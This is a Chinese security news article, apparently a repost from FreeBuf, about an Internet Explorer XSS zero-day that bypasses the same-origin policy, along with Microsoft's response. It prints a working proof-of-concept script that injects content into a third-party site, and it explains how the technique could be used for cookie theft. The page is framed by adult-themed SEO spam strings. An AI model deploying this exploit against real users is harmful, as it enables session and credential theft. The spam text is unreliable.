成人免费xxxxx在线视频软件_久久精品久久久_亚洲国产精品久久久_天天色天天色_亚洲人成一区_欧美一级欧美三级在线观看

最新XSS 0day漏洞來襲 影響最新版本IE瀏覽器

安全 漏洞
安全研究人員近日發現了一個嚴重的XSS 0day漏洞,該漏洞可影響最新版本的IE瀏覽器,將用戶暴露在被攻擊和身份盜竊的危險之中。

安全研究人員近日發現了一個嚴重的XSS 0day漏洞,該漏洞可影響最新版本的IE瀏覽器,將用戶暴露在被攻擊和身份盜竊的危險之中。

最新XSS 0day漏洞來襲 影響最新版本IE瀏覽器

漏洞信息

該漏洞能夠影響完全修復過的IE瀏覽器,黑客可以利用該漏洞盜取用戶的敏感數據(例如登錄憑證),并能向瀏覽器會話注入惡意內容。

攻擊者利用該XSS漏洞可以繞過同源策略(SOP)。同源策略是web應用中一個基本的安全模型,用來保護用戶的瀏覽體驗。

同源策略在維基百科上的解釋為:

“該策略允許同一站點(系統、主機名和端口號的組合)頁面上的腳本訪問彼此的DOM,而沒有特定的限制,但阻止訪問不同站點上的DOM。”

漏洞POC

上周Deusen公布了一個POC利用,以此演示當用戶使用完全修補的IE瀏覽器訪問特定的網頁時如何繞過SOP。該Demo向《每日郵報》官方網站中注入了“Hacked by Deusen”的內容。

最新XSS 0day漏洞來襲 影響最新版本IE瀏覽器

以同樣的方式,一旦攻擊者登錄網站,他們就可以冒充受害者從該網站盜取身份驗證cookie。一旦得到cookie,攻擊者就可以訪問某些限制區域,而正常情況下該區域只有受害者能訪問,包括信用卡數據、瀏覽歷史和其他機密數據。此外,釣魚網站也可以利用該漏洞誘騙網民泄露他們在敏感網站的登錄密碼。

下面是繞過IE瀏覽器中同源策略所使用的代碼:

function go()
{
   w=window.frames[0];
   w.setTimeout("alert(eval('x=top.frames[1];r=confirm(\\'Closethis window after 3seconds...\\');x.location=\\'javascript:%22%3Cscript%3Efunction%20a()%7Bw.document.body.innerHTML%3D%27%3Ca%20style%3Dfont-size%3A50px%3EHacked%20by%20Deusen%3C%2Fa%3E%27%3B%7D%20function%20o()%7Bw%3Dwindow.open(%27http%3A%2F%2Fwww.dailymail.co.uk%27%2C%27_blank%27%2C%27top%3D0%2C%20left%3D0%2C%20width%3D800%2C%20height%3D600%2C%20location%3Dyes%2C%20scrollbars%3Dyes%27)%3BsetTimeout(%27a()%27%2C7000)%3B%7D%3C%2Fscript%3E%3Ca%20href%3D%27javascript%3Ao()%3Bvoid(0)%3B%27%3EGo%3C%2Fa%3E%22\\';'))",1);
}
setTimeout("go()",1000);

微軟回應

微軟表示已經開始修復該漏洞。微軟確認目前還沒有收到大量漏洞利用的案例。

“我們還沒聽說這個漏洞被大量利用,目前我們正在進行安全更新。另外,要利用該漏洞,攻擊者需要首先誘導用戶進入一個惡意網站,這一步經常通過網絡釣魚來實現。不過,在新版本的IE瀏覽器中默認開啟的SmartScreen功能,能夠保護用戶免受釣魚網站危害。

我們將繼續鼓勵用戶不要打開來源不明的的鏈接,同時也不要訪問不可信的網站。并且,為了保護用戶的信息,我們建議在離開網站時要及時注銷登錄的賬號。”

微軟解釋說,攻擊者必須首先誘導受害者訪問一個惡意網站,這一般可以通過幾種方式簡單地實現:例如,可以通過垃圾郵件分享一個鏈接,或者通過社交網絡來實現。

接下來,讓我們共同等待微軟修復漏洞吧。

參考來源:http://securityaffairs.co/wordpress/33089/security/severe-xss-flaw-explorer.html

責任編輯:藍雨淚 來源: FreeBuf
相關推薦

2012-06-04 10:04:26

2009-12-16 10:04:51

Chrome瀏覽器漏洞

2013-02-28 11:28:30

2012-12-31 13:02:47

2009-04-13 08:43:01

微軟IE8 瀏覽器

2015-11-18 14:21:18

2009-12-31 11:09:36

Ubuntu wine

2010-12-24 14:50:46

2012-10-16 09:46:23

OpenStackFolsomSwift

2009-12-16 08:49:12

2013-01-08 10:29:29

傲游云瀏覽器

2013-04-17 10:01:52

jwplayerXSS漏洞

2012-03-12 17:23:45

2009-05-27 08:56:49

IQ瀏覽器瀏覽器新功能

2016-03-16 15:34:32

2013-05-06 15:15:23

2024-11-27 16:39:54

2010-05-24 19:09:01

SubVersion最

2012-11-12 10:10:37

FolsomOpenStack

2012-06-04 11:01:44

Windows 8版本
點贊
收藏

51CTO技術棧公眾號

主站蜘蛛池模板: 99久久久久国产精品免费 | 欧美日韩国产在线 | 欧美天堂在线观看 | 国产91久久久久蜜臀青青天草二 | 久久精品手机视频 | 2020亚洲天堂| 精品自拍视频在线观看 | 欧美日韩亚洲成人 | 91色视频在线观看 | 成人不卡 | 99亚洲精品 | www国产精 | 国产精品久久久久久av公交车 | 久久久久久成人网 | 96国产精品久久久久aⅴ四区 | 国产a区| 亚洲高清视频在线观看 | 一区二区三区四区不卡 | 古装人性做爰av网站 | 亚洲精品一区二区网址 | 久久久免费电影 | 精品久久一区 | 欧美日韩黄色一级片 | 在线视频 亚洲 | 亚洲精品www | 国产高清一区二区三区 | 国产精品久久久久一区二区三区 | 日韩在线观看中文字幕 | 天堂中文资源在线 | 亚洲成人一区二区 | 欧美精品在线播放 | 亚洲va中文字幕 | 国产精彩视频在线观看 | 亚洲综合视频 | 日本欧美在线视频 | 精品国产欧美一区二区三区成人 | 国产欧美一区二区精品久导航 | 国产精品久久久久久 | 午夜一区| 国产精品日韩欧美一区二区 | 午夜欧美一区二区三区在线播放 |